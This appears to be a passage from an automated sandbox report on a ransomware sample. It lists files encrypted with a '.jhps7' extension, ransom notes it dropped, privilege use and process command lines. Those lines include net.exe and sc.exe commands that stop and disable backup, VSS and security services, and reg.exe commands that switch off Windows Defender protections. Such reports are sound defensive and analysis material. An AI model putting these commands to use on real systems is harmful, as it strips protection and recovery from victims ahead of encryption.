| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\SKY.INF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_50S4_2GKpi40.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02743G.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_ietfb4yDpf40.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10265_.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_qPenILcwkEc0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\SUBMIT.JS.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_8r8n7O2vh5I0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\calendar.html | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_Ot4-BRBpVOw0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\VBENDF98.CHM.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_tYNE5h156iE0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01785_.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_ejDkUpNb-uE0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Clarity.thmx.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_6Xe4PVKgUZs0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw48.bmp | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_docked.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\flavormap.properties.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_CKOnfQsRD000.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kabul.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_H8_ysH1OV5c0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_nOawPqpkPdI0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Jayapura.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_HJpgra2PKGw0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Tongatapu.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_YZXiE3xprXI0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD09664_.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_PoFgODea85Y0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0240695.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_3oHjEzreFvY0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0336075.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_DD1FktKFpq40.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21315_.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_JGFJtpgVJ8Q0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\es-ES\gadget.xml | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_tDatXFn3nMs0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00608_.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_wVoQVlsauuA0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-3.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\GyDM_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\de-DE\msadcer.dll.mui | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115865.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_8RTeLd2R-f40.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\fr-FR\wmpnetwk.exe.mui | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099181.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_quaHYc52ueQ0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_left_disable.gif.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_14QF-F3brxE0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\drag.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\GyDM_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02446_.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_JGoscHH3fdE0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL044.XML.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_Ajgo8utBdCc0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ko.txt.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_MOlglUL-oY40.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\GoldRing.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)notConnectedStateIcon.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\de-DE\msdaprsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0090777.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_MwbOO68tbHo0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Solitaire\de-DE\Solitaire.exe.mui.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_SYlWSGO4sU00.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239953.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_8DKzi95OH_Y0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02074U.BMP.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_2TyluNyOAXs0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR5F.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_E3nas5TA5u80.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\20.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\GyDM_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Gaza.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_4IrIjFVxFd80.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099205.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_NrLVH77nBoc0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105230.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_lmfOb2-shGk0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14844_.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_dwiuYnFxHdY0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21340_.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_l3ZfTuzQV9k0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-overlay.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_ja_4.4.0.v20140623020002.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_dChs6bXxbhw0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msdaprsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02071U.BMP.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_9v9J0tGUQx00.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_UUamuYI-GU80.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\de-DE\js\calendar.js | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-explorer.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_1dQCooE08es0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe
"C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe"
C:\Windows\SysWOW64\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SamSs" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "VSS" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "wbengine" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "WebClient" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SysWOW64\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
